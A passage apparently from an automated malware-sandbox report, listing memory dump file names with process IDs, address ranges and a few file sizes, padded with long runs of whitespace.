                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4972-244-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/4996-305-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5004-322-0x0000000000400000-0x0000000000409000-memory.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                  Filesize

                                                                                                                                                                                                                                                                                                                                                                                                                                                                  36KB

                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5004-323-0x0000000000402E1A-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5012-402-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5072-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5168-470-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5204-471-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5220-472-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5236-473-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5248-429-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5276-474-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5352-475-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5540-450-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5576-451-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5692-459-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/5812-465-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                                                                                                                                                                                • memory/6012-468-0x0000000000000000-mapping.dmp